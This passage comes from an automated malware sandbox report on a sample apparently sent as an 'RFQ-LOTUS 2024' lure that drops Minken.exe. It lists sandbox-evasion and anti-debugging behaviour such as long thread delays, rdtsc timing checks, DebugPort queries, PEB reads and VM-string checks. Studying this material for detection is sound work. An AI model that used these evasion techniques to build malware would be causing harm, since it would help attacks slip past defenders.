Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\Minken.exe

Code function: 12_2_231CD1C0 rdtsc

12_2_231CD1C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7964			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1570			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Window / User API: threadDelayed 548			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Window / User API: threadDelayed 9425			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	API coverage: 0.5 %
Source: C:\Windows\SysWOW64\fc.exe	API coverage: 2.9 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8064	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe TID: 1716	Thread sleep time: -65000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep count: 548 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep time: -1096000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep count: 9425 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 412	Thread sleep time: -18850000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_00406370 FindFirstFileW,FindClose,		0_2_00406370
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_0040581E
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0012B5B0 FindFirstFileW,FindNextFileW,FindClose,		18_2_0012B5B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\			Jump to behavior

Source: RFQ-LOTUS 2024.exe, 00000000.00000002.1724752820.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Minken.exe, 0000000C.00000003.2734979919.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`Z
Source: svchost.exe, 00000005.00000002.4126984745.0000024951055000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4126864556.0000024951043000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000003.2734979919.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923889693.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, Minken.exe, 0000000C.00000002.2923752345.0000000007085000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.4124934957.000002494BA2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Minken.exe

Code function: 12_2_231CD1C0 rdtsc

12_2_231CD1C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_04CBD6CC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

1_2_04CBD6CC

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314C310 mov ecx, dword ptr fs:[00000030h]		12_2_2314C310
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23170310 mov ecx, dword ptr fs:[00000030h]		12_2_23170310
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321132D mov eax, dword ptr fs:[00000030h]		12_2_2321132D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321132D mov eax, dword ptr fs:[00000030h]		12_2_2321132D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A30B mov eax, dword ptr fs:[00000030h]		12_2_2318A30B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A30B mov eax, dword ptr fs:[00000030h]		12_2_2318A30B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318A30B mov eax, dword ptr fs:[00000030h]		12_2_2318A30B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D930B mov eax, dword ptr fs:[00000030h]		12_2_231D930B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D930B mov eax, dword ptr fs:[00000030h]		12_2_231D930B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D930B mov eax, dword ptr fs:[00000030h]		12_2_231D930B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23147330 mov eax, dword ptr fs:[00000030h]		12_2_23147330
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317F32A mov eax, dword ptr fs:[00000030h]		12_2_2317F32A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]		12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]		12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]		12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov ecx, dword ptr fs:[00000030h]		12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]		12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D035C mov eax, dword ptr fs:[00000030h]		12_2_231D035C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149353 mov eax, dword ptr fs:[00000030h]		12_2_23149353
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149353 mov eax, dword ptr fs:[00000030h]		12_2_23149353
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F367 mov eax, dword ptr fs:[00000030h]		12_2_2320F367
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D2349 mov eax, dword ptr fs:[00000030h]		12_2_231D2349
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D34C mov eax, dword ptr fs:[00000030h]		12_2_2314D34C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D34C mov eax, dword ptr fs:[00000030h]		12_2_2314D34C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225341 mov eax, dword ptr fs:[00000030h]		12_2_23225341
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231F437C mov eax, dword ptr fs:[00000030h]		12_2_231F437C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157370 mov eax, dword ptr fs:[00000030h]		12_2_23157370
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157370 mov eax, dword ptr fs:[00000030h]		12_2_23157370
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23157370 mov eax, dword ptr fs:[00000030h]		12_2_23157370
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321A352 mov eax, dword ptr fs:[00000030h]		12_2_2321A352
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A739A mov eax, dword ptr fs:[00000030h]		12_2_231A739A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A739A mov eax, dword ptr fs:[00000030h]		12_2_231A739A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23148397 mov eax, dword ptr fs:[00000030h]		12_2_23148397
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23148397 mov eax, dword ptr fs:[00000030h]		12_2_23148397
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23148397 mov eax, dword ptr fs:[00000030h]		12_2_23148397
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317438F mov eax, dword ptr fs:[00000030h]		12_2_2317438F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317438F mov eax, dword ptr fs:[00000030h]		12_2_2317438F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314E388 mov eax, dword ptr fs:[00000030h]		12_2_2314E388
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314E388 mov eax, dword ptr fs:[00000030h]		12_2_2314E388
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314E388 mov eax, dword ptr fs:[00000030h]		12_2_2314E388
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231733A5 mov eax, dword ptr fs:[00000030h]		12_2_231733A5
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231833A0 mov eax, dword ptr fs:[00000030h]		12_2_231833A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231833A0 mov eax, dword ptr fs:[00000030h]		12_2_231833A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322539D mov eax, dword ptr fs:[00000030h]		12_2_2322539D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F3E6 mov eax, dword ptr fs:[00000030h]		12_2_2320F3E6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]		12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]		12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]		12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]		12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]		12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315A3C0 mov eax, dword ptr fs:[00000030h]		12_2_2315A3C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]		12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]		12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]		12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231583C0 mov eax, dword ptr fs:[00000030h]		12_2_231583C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D63C0 mov eax, dword ptr fs:[00000030h]		12_2_231D63C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232253FC mov eax, dword ptr fs:[00000030h]		12_2_232253FC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0 mov eax, dword ptr fs:[00000030h]		12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0 mov eax, dword ptr fs:[00000030h]		12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0 mov eax, dword ptr fs:[00000030h]		12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231863FF mov eax, dword ptr fs:[00000030h]		12_2_231863FF
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320C3CD mov eax, dword ptr fs:[00000030h]		12_2_2320C3CD
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320B3D0 mov ecx, dword ptr fs:[00000030h]		12_2_2320B3D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231603E9 mov eax, dword ptr fs:[00000030h]		12_2_231603E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225227 mov eax, dword ptr fs:[00000030h]		12_2_23225227
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23187208 mov eax, dword ptr fs:[00000030h]		12_2_23187208
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23187208 mov eax, dword ptr fs:[00000030h]		12_2_23187208
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314823B mov eax, dword ptr fs:[00000030h]		12_2_2314823B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314A250 mov eax, dword ptr fs:[00000030h]		12_2_2314A250
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321D26B mov eax, dword ptr fs:[00000030h]		12_2_2321D26B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321D26B mov eax, dword ptr fs:[00000030h]		12_2_2321D26B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23156259 mov eax, dword ptr fs:[00000030h]		12_2_23156259
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149240 mov eax, dword ptr fs:[00000030h]		12_2_23149240
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23149240 mov eax, dword ptr fs:[00000030h]		12_2_23149240
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274 mov eax, dword ptr fs:[00000030h]		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318724D mov eax, dword ptr fs:[00000030h]		12_2_2318724D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D8243 mov eax, dword ptr fs:[00000030h]		12_2_231D8243
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D8243 mov ecx, dword ptr fs:[00000030h]		12_2_231D8243
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23179274 mov eax, dword ptr fs:[00000030h]		12_2_23179274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23191270 mov eax, dword ptr fs:[00000030h]		12_2_23191270
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23191270 mov eax, dword ptr fs:[00000030h]		12_2_23191270
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154260 mov eax, dword ptr fs:[00000030h]		12_2_23154260
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154260 mov eax, dword ptr fs:[00000030h]		12_2_23154260
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23154260 mov eax, dword ptr fs:[00000030h]		12_2_23154260
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320B256 mov eax, dword ptr fs:[00000030h]		12_2_2320B256
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320B256 mov eax, dword ptr fs:[00000030h]		12_2_2320B256
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314826B mov eax, dword ptr fs:[00000030h]		12_2_2314826B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318329E mov eax, dword ptr fs:[00000030h]		12_2_2318329E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318329E mov eax, dword ptr fs:[00000030h]		12_2_2318329E
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]		12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]		12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]		12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232192A6 mov eax, dword ptr fs:[00000030h]		12_2_232192A6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318E284 mov eax, dword ptr fs:[00000030h]		12_2_2318E284
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2318E284 mov eax, dword ptr fs:[00000030h]		12_2_2318E284
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D0283 mov eax, dword ptr fs:[00000030h]		12_2_231D0283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D0283 mov eax, dword ptr fs:[00000030h]		12_2_231D0283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D0283 mov eax, dword ptr fs:[00000030h]		12_2_231D0283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23225283 mov eax, dword ptr fs:[00000030h]		12_2_23225283
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov eax, dword ptr fs:[00000030h]		12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov eax, dword ptr fs:[00000030h]		12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov ecx, dword ptr fs:[00000030h]		12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231D92BC mov ecx, dword ptr fs:[00000030h]		12_2_231D92BC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602A0 mov eax, dword ptr fs:[00000030h]		12_2_231602A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231602A0 mov eax, dword ptr fs:[00000030h]		12_2_231602A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]		12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]		12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]		12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0 mov eax, dword ptr fs:[00000030h]		12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]		12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov ecx, dword ptr fs:[00000030h]		12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]		12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]		12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]		12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E62A0 mov eax, dword ptr fs:[00000030h]		12_2_231E62A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E72A0 mov eax, dword ptr fs:[00000030h]		12_2_231E72A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E72A0 mov eax, dword ptr fs:[00000030h]		12_2_231E72A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232252E2 mov eax, dword ptr fs:[00000030h]		12_2_232252E2
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317F2D0 mov eax, dword ptr fs:[00000030h]		12_2_2317F2D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317F2D0 mov eax, dword ptr fs:[00000030h]		12_2_2317F2D0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B2D3 mov eax, dword ptr fs:[00000030h]		12_2_2314B2D3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B2D3 mov eax, dword ptr fs:[00000030h]		12_2_2314B2D3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314B2D3 mov eax, dword ptr fs:[00000030h]		12_2_2314B2D3
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED mov eax, dword ptr fs:[00000030h]		12_2_232012ED
